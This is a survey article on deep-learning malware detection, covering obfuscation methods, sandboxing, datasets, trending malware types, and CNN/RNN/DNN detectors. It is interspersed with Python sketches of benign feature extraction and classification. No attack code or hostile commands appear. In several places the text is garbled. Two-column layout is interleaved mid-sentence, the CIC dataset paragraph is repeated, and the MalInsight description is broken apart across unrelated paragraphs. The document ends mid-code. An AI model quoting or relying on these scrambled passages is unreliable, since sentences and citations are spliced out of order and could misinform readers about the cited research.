
Computer Science Review 47 (2023) 100529

Contents lists available at ScienceDirect

Computer Science Review

journal homepage: www.elsevier.com/locate/cosrev

Review article

A comprehensive survey on deep learning based malware detection techniques

Gopinath M., Sibi Chakkaravarthy Sethuraman (Ph.D.)∗
Center of Excellence, Artificial Intelligence and Robotics (AIR) & Center of Excellence, Cyber Security and School of Computer Science and
Engineering VIT-AP University, Andhra Pradesh, India

Article info

Article history:
Received 18 September 2021
Received in revised form 7 December 2022
Accepted 8 December 2022
Available online xxxx

Keywords:
Malware detection
Deep learning
Mobile malware
IoT malware
Windows malware
APTs
Ransomware

Abstract

Recent theoretical and practical studies have revealed that malware is one of the most harmful threats to the digital world. Malware mitigation techniques have evolved over the years to ensure security. Earlier, several classical methods based on features such as signatures and heuristics were used to detect malware. These traditional techniques were unable to defeat new generations of malware and their sophisticated obfuscation tactics. Deep Learning (DL) is increasingly used in malware detection because DL-based systems outperform conventional approaches at finding new malware variants. Furthermore, DL-based techniques provide rapid malware prediction with excellent detection rates and support the analysis of different malware types. This work therefore investigates recently proposed DL-based malware detection systems and their evolution, and offers a thorough analysis of recently developed DL-based malware detection techniques. In addition, currently trending malware is studied, and detection techniques for mobile malware (both Android and iOS), Windows malware, IoT malware, Advanced Persistent Threats (APTs), and ransomware are reviewed in detail.
© 2022 Elsevier Inc. All rights reserved.

Contents

1. Introduction
2. Malware detection and techniques
2.1. Malware obfuscation methods
2.2. Sandboxing techniques
2.3. Data mining models and datasets
2.4. Currently trending prominent malware types
3. Malware detection and classification approaches
3.1. Static analysis
3.2. Dynamic analysis
3.3. Image processing
4. Deep Learning models
4.1. Deep neural network
4.2. Convolutional neural network
4.3. Recurrent neural network
5. Machine learning based malware detection techniques
5.1. Sandboxing based malware detection
5.1.1. Static analysis based malware detection techniques
5.1.2. Dynamic and hybrid analysis based malware detection techniques
5.1.3. Image based malware detection techniques
5.2. Mobile malware detection
5.2.1. Android malware detection techniques
5.2.2. iOS malware detection techniques
5.3. Windows malware detection techniques
5.4. IoT malware detection techniques
5.5. APT detection techniques
5.6. Ransomware detection techniques
6. Deep learning based malware detection techniques
6.1. Sandboxing based malware detection
6.1.1. Static analysis based malware detection techniques
6.1.2. Dynamic and hybrid analysis based malware detection techniques
6.1.3. Image based malware detection techniques
6.2. Mobile malware detection
6.2.1. Android malware detection techniques
6.3. Windows malware detection techniques
6.4. IoT malware detection techniques
6.5. APT detection techniques
6.6. Ransomware detection techniques
7. Inference
8. Conclusion
Declaration of competing interest
Data availability
Acknowledgments
References

∗ Corresponding author.
E-mail address: [email protected] (S.C. Sethuraman).

https://doi.org/10.1016/j.cosrev.2022.100529
1574-0137/© 2022 Elsevier Inc. All rights reserved.

1. Introduction

Malware, or malicious software, is intentionally developed to harm digital devices. It goes by a variety of names, such as Trojan horse, worm, virus, bots and botnets, ransomware, adware, and spyware. Attackers target individual computers and networks, which eventually increases the number of security loopholes. Leakage of private and personal information is among the main problems faced by legitimate users. The damage incurred by cyber fraud has doubled compared with traditional fraud [1], and financial losses due to attacks such as phishing, pharming, and payment-card misuse have increased significantly. The financial damage caused by malware worldwide is growing proportionally. According to scientific and business reports, about 1 million new malware samples are generated per day on average, and the cost of cybercrime was estimated at 6 trillion US dollars in 2021 [2]. According to the McAfee COVID-19 threat report, malware attacks increased by 1902% over the past four quarters, and 375 new cybercrimes per minute were recorded worldwide [3]. Between 2019 and 2024, the market for malware analysis is expected to grow from 3 billion USD to 11.7 billion USD, a compound annual growth rate (CAGR) of 31% [4]. A recent AV-Test Institute estimate reports that more than 360,000 new malware samples are produced daily, approximately 4.2 per second [5]. Reports from the past five years indicate that the number of malware samples grows by about 100 million every year. To respond comprehensively to these challenging and dangerous cyber threats, several security firms are deploying various tools, and researchers are building Machine Learning and Deep Learning models to address these issues through detailed studies [6]. Malware mitigation techniques are also becoming more sophisticated as malware diversity increases.

Earlier, malware was written with simple code and was easily detected. Nowadays, malware creators increase the complexity of their code, so even advanced techniques fail to detect it. Next-generation malware, which is designed to execute in the kernel, is harder to identify than traditional malware. Such malware easily escapes security systems like firewalls and antivirus software, persists in a system or network permanently, spreads through multiple extensions, and attacks the targeted user. Malware detection approaches are based on miscellaneous features and platforms, such as signatures, heuristics, behaviour, model checking, cloud, mobile devices, Internet of Things (IoT), Machine Learning, and Deep Learning [7]. Initially, signature-based detection methods were frequently employed. Although fast, they cannot identify sophisticated malware [8], and traditional signature-based methods such as pattern matching failed to meet the requirements of malware detection [9]. Consequently, implementing advanced security approaches is a nightmare for both end users and security providers [10]. Newer techniques have therefore been proposed based on features such as heuristics and model checking, incorporating advanced data mining and Machine Learning algorithms to detect malware.

Recent technologies deliver higher efficiency than traditional ones. Still, no single one of these approaches can be relied on for malware detection, as none is fully effective against new-generation malware. In one approach, malware is discovered by automatically extracting and statically analysing Application Programming Interface (API) function calls, focusing on API calls with dangerous characteristics [11]. To analyse harmful behaviour, this method entails four steps: unpacking the malware, retrieving the assembly program, extracting the API calls, and mapping the API calls to the Microsoft Developer Network (MSDN) library to evaluate dangerous behaviour. A more advanced five-step method uses Machine Learning algorithms such as the Support Vector Machine (SVM) with n-gram features and 10-fold cross-validation [12]. For the detection and classification of zero-day malware, a framework has been implemented with various traditional Machine Learning classifiers [13]. To understand malware behaviour, both static and dynamic analysis are used to extract features such as Windows API calls; resemblance-oriented (similarity-based) mining and Machine Learning algorithms are then used to profile and classify malware behaviours based on the sequence of API calls and their respective frequencies [14]. This approach achieves a true-positive rate of 0.94 and a false-positive rate of 0.051 in detecting malware.

To achieve high accuracy in malware detection, a hybrid wrapper-filter model has been proposed [15]. It selects features with the highest significance and lowest redundancy with the help of an SVM wrapper. It is a fully automated framework and employs a signature-free method to detect malware that evades signature-based identification. Alazab et al. describe many types of obfuscated malware and their development in depth, as well as the significance of anomaly detection [16]. Neural networks have also been used to detect malware from the Portable Executable (PE) header, with the networks learning entirely from raw bytes [17].
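The API-call profiling idea discussed in this section (API calls and their frequencies [14], evaluated by true- and false-positive rates) can be illustrated with a minimal sketch. It is not the method of [11], [12], or [14]: it assumes each sample has already been reduced to a list of Windows API call names (by static extraction or from a sandbox trace), represents each sample by its call-frequency profile, and labels a new sample with the label of the most similar reference profile under cosine similarity. The helper names, reference traces, and confusion-matrix counts below are hypothetical.

```python
from collections import Counter
from math import sqrt


def api_profile(trace):
    """Frequency profile of the API calls observed for one sample."""
    return Counter(trace)


def cosine(p, q):
    """Cosine similarity between two sparse frequency profiles."""
    dot = sum(p[name] * q[name] for name in p.keys() & q.keys())
    norm_p = sqrt(sum(v * v for v in p.values()))
    norm_q = sqrt(sum(v * v for v in q.values()))
    return dot / (norm_p * norm_q) if norm_p and norm_q else 0.0


def classify(trace, references):
    """Return the label of the reference trace most similar to `trace`.

    references: list of (label, trace) pairs with known labels (hypothetical).
    """
    profile = api_profile(trace)
    label, _ = max(references, key=lambda ref: cosine(profile, api_profile(ref[1])))
    return label


def detection_rates(tp, fn, fp, tn):
    """True-positive rate TP/(TP+FN) and false-positive rate FP/(FP+TN)."""
    return tp / (tp + fn), fp / (fp + tn)


if __name__ == "__main__":
    # Hypothetical reference traces; real systems use far richer profiles.
    references = [
        ("malware", ["VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"]),
        ("benign", ["CreateFileW", "ReadFile", "CloseHandle"]),
    ]
    unknown = ["VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread", "CloseHandle"]
    print(classify(unknown, references))  # malware
    # Hypothetical counts chosen to reproduce rates of 0.94 and 0.051.
    print(detection_rates(tp=94, fn=6, fp=51, tn=949))  # (0.94, 0.051)
```

Cosine similarity ignores the absolute length of a trace, so long and short runs of the same program remain comparable. Capturing call order, as [14] does, would require sequence features such as n-grams rather than plain frequencies.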

The challenges and many issues of the dynamic analysis approach are covered extensively in [18]. A reinforcement learning agent has also been employed to operate on PE files [19]. Knowledge can be extracted from raw data, whether structured or unstructured, using data science approaches [20]. Deep Learning, comprising multiple processing layers and deep convolutional networks, makes it possible to process different forms of files such as text, image, video, audio, and PE files [21].

This paper presents a detailed survey of recent Deep Learning-based malware detection techniques. It traces the progression of innovations from the beginning to the present and, to strengthen the study, explores the benefits and shortcomings of each technique. The major contributions of this paper are as follows:

• It provides an advanced and detailed review of how malware detection has evolved from traditional techniques to Deep Learning-based ones. It also organizes the discussion around sandboxing approaches, Deep Learning models, currently trending malware such as ransomware and APTs, and traditional malware targeting IoT, Windows, Android, and iOS.
• Several reviews of malware detection techniques have been carried out recently [7,22,23]. These works are limited in focus: file-less malware and APTs, for example, are not covered by even a single deep learning technique in [23]. Other reviews based on Machine Learning and Deep Learning exist, but they do not map the techniques to trending malware such as ransomware and APTs, whereas this survey correlates them [24–26].
• Research gaps in recent mitigation techniques are also discussed, which will be helpful for future reviews. A taxonomy derived from recent research works is proposed in Fig. 1, and the relationships between these works are highlighted.
• Finally, this survey aims to guide researchers in the right direction for building mitigation techniques against traditional and advanced malware, and to support those working on Deep Learning-based malware detection and prevention.

The rest of the paper is organized as follows. Section 2 provides brief information about malware obfuscation methods, sandboxing techniques, datasets, and currently trending prominent malware types. Section 3 details malware classification approaches. Section 4 describes various Deep Learning models for malware detection. Section 5 explores Machine Learning-based malware detection techniques on the basis of sandboxing techniques, as well as detection techniques for mobile malware (including Android and iOS), Windows malware, IoT malware, APTs, and ransomware. In a similar vein, Section 6 examines Deep Learning-based malware detection techniques based on sandboxing techniques and for mobile malware, Windows malware, IoT malware, APTs, and ransomware. Section 7 details the inferences drawn from this survey, and Section 8 concludes this review.

2. Malware detection and techniques

2.1. Malware obfuscation methods

A virus was the first type of malware to be discovered, around the end of the 1980s, and studies show that detecting viruses is a difficult task that is NP-complete [17,27–32]. Malware writers use antivirus (AV) evasion techniques to avoid detection by antivirus software; security researchers and penetration testers also use such techniques for security testing. Attackers leverage both static and dynamic AV evasion techniques to exploit target machines by executing generated payloads. Static evasion bypasses the antivirus signature-scanning algorithms used for malware detection, whereas dynamic evasion avoids behaviour detection while the sample is executed within a sandbox or AV emulator. Advanced next-generation malware adopts obfuscation methods such as encryption, oligomorphism, polymorphism, metamorphism, stealth, and packing, which help it evade malware detection techniques. Using encryption, malware can be concealed inside the program [18]. Encryption is also used for packing, which keeps malware hidden from detection techniques; packers come in four types: compressors, crypters, protectors, and bundlers [20,21].

In the oligomorphic method, the malware payload is encrypted, and different keys are used for encryption and decryption [33]. This makes malware detection harder. The polymorphic method is similar to the oligomorphic method; the difference is that it produces many more distinct copies of the encrypted payload, which makes detection even more complex [34,35]. In the metamorphic method, the malicious code itself changes in each iteration of the malicious process [19]. The stealth method hides malware from security systems by adopting countermeasures such as code modification and data encryption [33].

2.2. Sandboxing techniques

Malware detection is a decision-making process at the end of which the malicious program is identified. Malware researchers use a sandbox environment to execute malicious code obtained from unknown attachments or suspicious URLs and observe its behaviour. Because a sandbox is an emulated environment, suspicious code can be observed without it gaining access to data, the network, or other applications. A sandbox acts as a quarantine for unknown emails and attachments and plays a key role in isolating suspicious executable programs.

Analysing the malware, extracting features, and classification are the three basic steps of the detection process. While analysing malware, it is important to study its behaviour; how malware works and the damage it causes are studied extensively in [36,37]. Static and dynamic analyses are the two principal techniques for analysing malware [37]. Static analysis examines the executable file without running the program, whereas dynamic analysis evaluates behaviour during execution of the program and is performed in a virtual sandboxed environment. The malware analysis cycle starts with simple static analysis and ends with an efficient dynamic analysis.

2.3. Data mining models and datasets

Data mining methods are used to extract malware features and to derive richer semantic information from large-scale datasets. Recently developed and significant data mining models for generating datasets and features include the n-gram model and the graph model [38].

n-gram model: Features are generated from the characteristics obtained through static and dynamic analysis; API calls and system calls are combined to provide features.

graph model: A graph G(V, E) is generated from system calls, in which the nodes V specify system calls and the edges E relate these system calls to one another. As the graph grows, analysis has to rely on subgraphs, and subgraph matching is Non-deterministic Polynomial (NP) complete.
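The two data mining models above can be sketched on a single system-call trace. This is a minimal illustration under stated assumptions, not the exact construction of [38]: the n-gram model counts every contiguous run of n calls, and the graph model takes the distinct calls as the vertex set V and draws an edge in E from each call to the call that immediately follows it, weighted by how often that transition occurs. The function names and the trace (a sequence of Windows native API names) are hypothetical.

```python
from collections import Counter


def ngram_features(calls, n=2):
    """n-gram model: count every contiguous sequence of n calls."""
    return Counter(tuple(calls[i:i + n]) for i in range(len(calls) - n + 1))


def call_graph(calls):
    """Graph model G(V, E): V = distinct calls, E = consecutive-call transitions.

    Edge weights count how many times each transition occurs in the trace.
    """
    vertices = set(calls)
    edges = Counter(zip(calls, calls[1:]))
    return vertices, edges


if __name__ == "__main__":
    # Hypothetical trace of system calls recorded in a sandbox.
    trace = ["NtOpenFile", "NtReadFile", "NtWriteFile",
             "NtReadFile", "NtWriteFile", "NtClose"]
    print(ngram_features(trace, n=2).most_common(1))
    # [(('NtReadFile', 'NtWriteFile'), 2)]
    vertices, edges = call_graph(trace)
    print(len(vertices), len(edges))  # 4 4
```

For n = 2 the edge weights coincide with the bigram counts. The graph view pays off when structure matters, such as the NtReadFile/NtWriteFile cycle above, and that is exactly where matching subgraphs against known malicious patterns becomes NP-complete.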

Fig. 1. Taxonomy of research.

Malware datasets are a key factor in malware detection, although the formats of existing datasets can occasionally make them challenging to use for mining. NSL-KDD, Drebin, the MS Malware Classification Challenge, ClaMP, AAGM, and EMBER are some examples of datasets used so far. In the classification stage, Machine Learning algorithms are applied to carry out operations such as classification, regression, and clustering over the data. Bayesian Network (BN) [39], Naive Bayes (NB) [40], the C4.5 decision tree variant (J48) [41], Logistic Model Trees (LMT), Random Forest (RF) [40,42,43], K-Nearest Neighbour (KNN) [44,45], Multi-Layer Perceptron (MLP) [46,47], Simple Logistic Regression (SLR), Support Vector Machine (SVM) [48,49], and Sequential Minimal Optimization (SMO) [50] are examples of Machine Learning classifiers that use behavioural features to make predictions.

The NSL-KDD (2009) dataset is used for intrusion detection system (IDS) purposes and has approximately 125,000 records and 41 features [28]. The Drebin (2014) dataset contains 5,560 malware samples from 179 families and is used for smartphone (Android) malware detection [51]. The MS Malware Classification Challenge (2015) dataset contains disassembly code and byte code for roughly 20,000 malware samples from 9 families [52]. The ClaMP (2016) dataset comprises 5,184 records and 55 features [53]. The AAGM (2017) dataset is associated with Android malware and has 400 malware samples from 12 families [54]. The EMBER (2018) dataset contains more than 1 million records with features of benign and malicious files for detecting Windows malware [55].

There are several datasets created by the Canadian Institute for Cybersecurity (CIC) [56]. CIC-MalMem-2022, an obfuscated malware dataset, was developed for memory-based detection methods; it contains 29,298 benign and 29,298 malware samples. The Android malware dataset CCCS-CIC-AndMal-2020 has a total of 400k apps, of which 200k are benign and 200k are malware.
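Of the classifiers listed above, K-Nearest Neighbour (KNN) is the simplest to show end to end. The sketch below is a minimal, unoptimized KNN in plain Python, not the implementation used in [44,45]. The function name, the two features per sample (a file entropy value and a count of suspicious imported APIs), and all training points are hypothetical; real work would use feature vectors derived from datasets such as those described above.

```python
from collections import Counter
from math import dist


def knn_predict(train, query, k=3):
    """Predict a label by majority vote among the k nearest training samples.

    train: list of (feature_vector, label) pairs; distance is Euclidean.
    """
    nearest = sorted(train, key=lambda sample: dist(sample[0], query))[:k]
    votes = Counter(label for _, label in nearest)
    return votes.most_common(1)[0][0]


if __name__ == "__main__":
    # Hypothetical features: (file entropy, number of suspicious imported APIs).
    train = [
        ((4.5, 1), "benign"), ((5.0, 0), "benign"), ((4.8, 2), "benign"),
        ((7.6, 9), "malware"), ((7.9, 12), "malware"), ((7.2, 8), "malware"),
    ]
    print(knn_predict(train, (7.5, 10)))  # malware
    print(knn_predict(train, (4.7, 1)))   # benign
```

Because KNN relies on raw distances, features on different scales (entropy lies between 0 and 8 bits per byte, whereas API counts are unbounded) should normally be standardized first; an odd k avoids ties in two-class problems.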

of Cyber security (CIC) [56]. CIC-MalMem-2022, an obfuscated 3. Malware detection and classification approaches
malware dataset, was developed by implementing memory-based
detection methods. It contains 29,298 benign and 29,298 malware Today malware is coded to present features from multiple
samples. Android malware dataset CCCS-CIC-AndMal-2020 has a families at the moment of discovery, making malware classifica-
total of 400k apps in which 200k samples are benign and 200k tion extremely challenging. As advanced malwares are executed
samples are malware. in the kernel it is hard to discover them when compared with
classical malwares. These types of malwares easily escape from
2.4. Currently trending prominent malware types
security systems like firewalls and antivirus. In this section, the
In the year 2019, 4,368,921,256 records were assessed by advantages and drawbacks of classification techniques for de-
security experts [5]. 10 lakh spam messages and 5 lakh URLs are tecting malware based on static and dynamic analysis are dis-
evaluated. Around 3 million files were tested every day with a cussed. Further for malware detection, image processing-based
size of 2500 TB. In earlier 2020, the malware growth reached over techniques are also utilized with big data to enhance the visu-
43 million which implies the most dangerous scenario in 2020 alization of data and efficient decision-making.
with a development of 4.2 samples per second and most attacks
are targeted at the Windows operating system [5]. Global mal- 3.1. Static analysis
ware strikes reached 2.8 billion in the first half of 2022, up 11%
year to date from 2021, according to threat experts at SonicWall Earlier malware classification approaches used various fea-
Capture Labs [57]. Malware exploitation is concentrated in two tures like n-gram which includes multi-byte identifiers and
different areas by the attackers. Initially, by creating automated strings [53]. Sequence CNN is applied for classification where
bulk malware, widespread web attacks are targeted. Further,
features are extracted from the bytes of binaries [35]. Ember
sophisticated malware is created to target specialized attacks,
large-scale dataset is used for training ML models and detection
which use a specially created attack tool based on previously
of PE files [54]. It has 1.1 million binary files in which 900k
determined victim infrastructure. Microsoft systems are the most
targeted for launching attacks by cybercriminals, according to are training samples and 200k are testing samples. Other than
statistics [5]. a benchmark dataset, it is useful for end-to-end deep learning.
A byte/entropy 2histogram is computed for malware detection
Trojans using deep neural networks [58].
Trojans are a type of malicious software that typically deceives Han et al. implemented a program profiling model MalIn-
people into thinking they are not at all harmful. Trojans usually sight for detecting malware. Profiling is performed by consider-
spread through spam emails and downloadable files by hiding
ing the structure, low-level, and high-level behavioural features
themselves. Trojans are usually spread by visiting contaminated
of malwares [42]. Structural information is obtained from ba-
websites, opening bulky spam mail, downloading illegitimate
sic structural profiling. Operations between programs and OS
apps and software, and running suspicious files of movies and
songs. Also, malware can spread through QR codes and through storage devices such as USB drives and external hard disks. Once an adequate number of infected systems is identified, attackers proceed with their special code. According to ThreatFabric, more than 300,000 Google Play Store customers contracted mobile banking Trojans in 2021.

Ransomware
Ransomware denies access to the device and private files and demands a ransom fee that must be paid to regain access. Several types of ransomware exist, such as Android ransomware, Mac ransomware, and scareware. They aim to deny users or organizations access to the files on their computers. Ransomware became a profitable business for cybercriminals in 2019, tripled in 2020, and reached a peak of 900,000 malware samples [58]. In the first half of 2022, ransomware attacks dropped by 23% globally [57].

Advanced Persistent Threats (APT)
APTs use continuous, stealthy, and complex hacking approaches to gain access to a system and remain inside it for an extended period by exploiting high-level vulnerabilities [5]. The enormous number of APTs makes them a challenging threat for security systems to tackle. APTs are planned attacks that deliberately target multiple firms and institutions, including the public, financial, and research sectors, to obtain valuable information.

Potentially Unwanted Applications (PUA)
Potentially Unwanted Applications (PUA) are another kind of malware attack in the digital world [5]. A PUA is spyware that is intentionally installed on devices along with a software package when apps are downloaded. Advertising companies use PUAs to track and investigate individual behaviour and obtain information. PUAs target users with personalized advertisements by injecting unnecessary secret questions.

lead to low-level profiling, and the operations on files, registry, and network lead to high-level profiling. Machine Learning-based classifiers such as KNN, DT, RF, and Extreme Gradient Boosting are trained on the resulting feature set to detect or classify malware. Evaluation is carried out on a dataset of 4250 samples drawn from sources such as VirusShare and Windows 7 Pro. According to the results, the method detects new malware types with 97.21% accuracy.

Kim et al. implemented a multimodal deep learning scheme to detect Android mobile malware [59]. It uses many features: strings, method opcodes, method APIs (Application Programming Interfaces), function opcodes of the shared library, permissions, components, and environment. The extracted features are used to generate feature vectors that train the initial networks. The final network is then trained on the outputs of the initial networks. The evaluation was carried out with 41,260 samples.

Fang et al. built the Deep Q learning-based Evading Anti-malware engines (DQEAF) framework [60]. It uses reinforcement learning to expose and demonstrate the weakness of supervised learning-based malware detection models. DQEAF trains an Artificial Intelligence (AI) agent, built on neural networks, that interacts with malware samples and uses reinforcement learning to choose the optimal sequence of actions. DQEAF achieves a 75% evasion success rate on Portable Executable (PE) samples. Later, the authors introduced the Deep Q learning-based Feature Selection Architecture (DQFSA), an architecture for feature selection using reinforcement learning [40]. An AI agent continuously interacts with the samples' feature space to obtain an optimized set of features without human intervention. Classifiers such as KNN, DT, RF, NB, and SVM achieve better accuracy with the selected features than with existing architectures.
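The sketch below makes concrete the step in Kim et al.'s multimodal scheme [59] where several feature types are extracted and turned into feature vectors. It uses the hashing trick to turn each feature type of one app into a fixed-length block, and each block could feed a separate initial network. This is an illustrative assumption, not the authors' encoding. The modality names, the 16-bucket size, and the use of hashing are all hypothetical.

```python
import hashlib
from typing import Dict, Iterable, List

# Hypothetical modality names, loosely following the feature types listed for Kim et al. [59].
MODALITIES = ("string", "opcode", "api", "permission")


def bucket(token: str, dim: int) -> int:
    """Map a token to a stable bucket index (MD5 is used only for determinism, not security)."""
    digest = hashlib.md5(token.encode("utf-8")).digest()
    return int.from_bytes(digest[:4], "little") % dim


def modality_vector(tokens: Iterable[str], dim: int = 16) -> List[float]:
    """Existence vector: a bucket is 1.0 if at least one token hashes into it."""
    vec = [0.0] * dim
    for tok in tokens:
        vec[bucket(tok, dim)] = 1.0
    return vec


def multimodal_blocks(sample: Dict[str, List[str]], dim: int = 16) -> Dict[str, List[float]]:
    """One fixed-length block per modality; a missing modality yields an all-zero block."""
    return {name: modality_vector(sample.get(name, []), dim) for name in MODALITIES}


def concatenate(blocks: Dict[str, List[float]]) -> List[float]:
    """Flatten the blocks in a fixed modality order (e.g. for a single-network baseline)."""
    out: List[float] = []
    for name in MODALITIES:
        out.extend(blocks[name])
    return out


app = {
    "string": ["http://example.com/c2", "su"],
    "opcode": ["invoke-virtual", "const-string"],
    "api": ["sendTextMessage"],
    "permission": ["SEND_SMS", "INTERNET"],
}
blocks = multimodal_blocks(app)
print(len(blocks), len(concatenate(blocks)))  # 4 64
```

Keeping the blocks separate mirrors the idea of training one initial network per feature type and a final network on their outputs. `concatenate` is included only for comparison with a single-network baseline.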

3.2. Dynamic analysis

In [28], an RNN is trained to extract process behaviour features, after which a CNN is trained to classify the resulting images. For the projection stage, an Echo State Network (ESN) and an RNN are used, and features are extracted by training on 150k samples. A shallow multi-task deep learning architecture based on natural language modelling is proposed for distinguishing malware from benign files [38]; it learns the language of malware to extract features. To obtain optimal malware classification results, convolutional and recurrent neural network layers are combined. This improves the modelling and classification of system call sequences [52] and outperforms Hidden Markov Models and SVM.
An RNN-based malware prediction model is proposed and evaluated on two different datasets. It predicts malicious files before the payload executes, which allows attacks to be prevented [34]. The performance of classical Machine Learning classifiers is also evaluated. Results show 94% accuracy with an execution time of 5 s.
Behavioural data collected through dynamic analysis are examined, and Hidden Markov Models are trained using both static and dynamic analysis. To identify malware families, the attributes obtained from both analyses are compared, and the results show that the dynamic approach performs better [61].
Zhong et al. devised a Multi-Level Deep Learning System (MLDLS) to improve the efficiency of Deep Learning-based Malware Detection Systems (MDSs) [62]. It uses a tree structure to coordinate multiple deep learning models. Each deep learning model focuses on learning the data distribution of a particular class of malware, and all the models in the tree collaborate to reach a decision. Shibahara et al. developed a method, based on network behaviour, that improves the efficiency of dynamic analysis [51]. This approach focuses on identifying two unique aspects of malware communication: variations in the communication mechanism and latent function. It exploits structures shared by malware communication and natural language, and it is evaluated with 29,562 malware samples.
Vinaya Kumar et al. built a two-stage malware detection framework [63]. To create a highly scalable framework, the authors explore classical Machine Learning methods as well as deep learning frameworks based on static analysis, dynamic analysis, and image processing. In the first stage, malware is classified using static and dynamic analyses. In the second stage, image processing is used to group malware into its respective families. The resilience of the framework proposed in [64] must be taken into account, since it is intended as an efficient zero-day malware detection mechanism.

3.3. Image processing

Detecting malicious files by examining large volumes of data has become a difficult challenge for security providers. To analyse vast amounts of malware, an image-based deep learning malware classification model is proposed [65]. Orthogonal methods for malware detection are based on signal and image processing. Azmoodeh and Choo presented a scheme that detects malware on Internet of Battlefield Things (IoBT) devices by applying deep learning to the devices' opcode sequences.
Li et al. designed a Machine Learning framework for detecting malware that uses Domain Generation Algorithms (DGA) [8]. Many DGA domains are classified with a deep learning method using one year of collected real-time traffic data. The framework consists of a two-level model and a prediction model. In the two-level model, DGA domains are separated from normal domains, and clustering is used to identify the algorithms that generate the DGA domains. The prediction model first adopts a Deep Neural Network (DNN), and a time sequence model based on a Hidden Markov Model (HMM) is then designed to anticipate incoming domain features. The framework's classification accuracy is reported as 95.89%.
The structural similarities of malware are exploited in [66,67]. Signal and image processing methods are used to detect and classify malware by treating malware samples as images or signals. This meta-learning-based method is extended to forensics and to the classification of data types. Search and RetrieVAl of Malware (SARVAM) is presented for searching and retrieving malware online [68]. Anyone can upload an executable binary file and search a database of 7 million malware samples using image similarity metrics.
The automated malware classification method proposed in [69] uses image texture analysis. On a sizable dataset of over 685k malware samples, it proves more effective than dynamic analysis. For quick recognition of packed executables, core binary data is evaluated, and an SVM is used for both training and testing [70]. Another approach detects malware by expressing binary bytes as audio signals [71]. Music Information Retrieval (MIR) techniques are then used to identify musical patterns, and ML classifiers are applied. Malware authors create new malicious variants by making slight changes to the original code. These minor changes are captured as images, and similar images form a family. Features are extracted by classification or clustering techniques.
Image-based malware analysis is fast and provides a lot of information about the structure of malware. SigMal [72] is a fast, similarity-based signal processing framework for malware detection that applies to both packed and unpacked samples. Its signal processing-based features are improved by heuristics based on PE structure information. Image-based malware detection techniques use datasets such as Malimg, as well as pretrained models such as VGG16 trained on ImageNet [37]. VGG16 combined with an SVM achieves higher accuracy than VGG16 trained from scratch [36]. Later, the YongImage method [73] was implemented for detecting malware.

4. Deep Learning models

Deep Learning is a branch of Machine Learning, which is used within artificial intelligence and learns from samples. Deep Learning extracts features from an input through numerous layers arranged in a hierarchy. Deep Learning has many applications, such as autonomous cars, image processing, and language processing. Deep Learning models are built using either Supervised or Unsupervised Learning [8,13,27,35,36,52,53,74–79], which differ in their training methodology. Supervised models are trained on labelled examples from specific datasets, whereas unsupervised models are given only input data. This section discusses deep neural networks, convolutional neural networks, and recurrent neural networks, which are useful for real-time environments. Fig. 2 shows the basic Deep Learning architecture.

4.1. Deep neural network

A deep neural network is an artificial neural network with many layers between its input and output layers. A sample DNN with n hidden layers (h1 to hn) is shown in Fig. 3. By using random projections, the input size
of the large-scale network is reduced by a factor of 45 over 2.6 million samples. The reported two-class error rates are 0.49% for a single neural network and 0.42% for an ensemble of neural networks [80]. Detection accuracy does not improve with additional hidden layers. Networks with two or more hidden layers perform worse than networks with a single hidden layer.

Fig. 2. Deep Learning architecture.

Fig. 3. Deep Neural Network (DNN).

Droid-Sec is designed for Android malware and uses deep learning [81]. It compares its results with five earlier machine learning models: SVM, C4.5, Naïve Bayes, LR, and MLP. The deep learning model is created by implementing a Deep Belief Network (DBN) [82]. In addition, Restricted Boltzmann Machines (RBM), components, and algorithms are taken into account. Compared with more established techniques such as SVM, C4.5, and Naive Bayes, the results obtained are more promising.
In [58], features of 2D binary programs are used to detect malware with a deep neural network. The framework is divided into three stages. In the first stage, four different types of features are extracted from benign and malicious binaries. In the second stage, a deep neural network is built with an input layer, two hidden layers, and an output layer. The third stage is a score calibrator, which translates the outputs of the neural network into the probability that a file is malware. On over 4 million software binary files, a 95% Detection Rate (DR) at a 0.1% False Positive Rate (FPR) was attained. Cross-validation-based methods show higher accuracy than split validation methods. This implies that more benign samples need to be analysed to improve accuracy. A deep learning-based model called the Multi-Task Neural Network (MtNet) has been proposed to classify malware [38]; it separates benign and malicious files through dynamic analysis. It is trained on 4.5 million files and tested on 2 million files. MtNet attains a 0.358% binary classification error rate and a 2.94% malware family classification error rate.

4.2. Convolutional neural network

A convolutional neural network is derived from the DNN and is mainly used for visual data. Fig. 4 depicts a sample CNN. CNNs were applied to image recognition with a unique feature extractor and image size normalization [83]. A CNN has been trained on 1.2 million high-resolution images for classification [84]. Non-saturating neurons and highly configured Graphics Processing Units (GPUs) are used for faster training. Davis et al. applied a CNN to malware detection, with features extracted by disassembling byte codes [27]. Similarly, other researchers applied CNNs to malware byte code represented as 2-dimensional grayscale images [29,30,66,68–70]. Each sample is normalized to 32 × 32 pixels by down-sampling.
The CNN-BiLSTM (Bidirectional Long Short-Term Memory) model does not require expert domain knowledge, because it relies on the data for feature extraction [85]. Similarly, Kolosnjaji et al. proposed a model that merges a CNN and an LSTM [52]. In this model, the CNN observes API call sequences and the LSTM captures the relationships between them. In the CNN-BiLSTM model [85], the outputs of the convolutional layers are connected to forward and backward LSTM layers. The outputs of those LSTM layers are combined to produce the final output.
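The dependency-free sketch below shows how a malware binary can be converted into a 2-dimensional grayscale image and normalized to 32 × 32 pixels. It assumes a fixed row width of 256 bytes and uses simple block averaging for down-sampling. The cited works may choose the width from the file size and use a different interpolation. A real pipeline would also read the bytes from a file rather than synthesize them.

```python
from typing import List

Image = List[List[float]]


def bytes_to_grayscale(data: bytes, width: int = 256) -> List[List[int]]:
    """Wrap raw bytes into rows of `width` pixels (values 0-255); zero-pad the last row."""
    if not data:
        raise ValueError("empty input")
    rows = []
    for start in range(0, len(data), width):
        row = list(data[start:start + width])
        row.extend([0] * (width - len(row)))
        rows.append(row)
    return rows


def downsample(img, out_h: int = 32, out_w: int = 32) -> Image:
    """Block-average an image to out_h x out_w pixels (each output pixel covers >= 1 input pixel)."""
    h, w = len(img), len(img[0])
    out = []
    for i in range(out_h):
        r0 = i * h // out_h
        r1 = max((i + 1) * h // out_h, r0 + 1)
        row = []
        for j in range(out_w):
            c0 = j * w // out_w
            c1 = max((j + 1) * w // out_w, c0 + 1)
            block = [img[r][c] for r in range(r0, r1) for c in range(c0, c1)]
            row.append(sum(block) / len(block))
        out.append(row)
    return out


# A synthetic 16 KiB "binary": 64 rows of the byte values 0..255.
sample = bytes(range(256)) * 64
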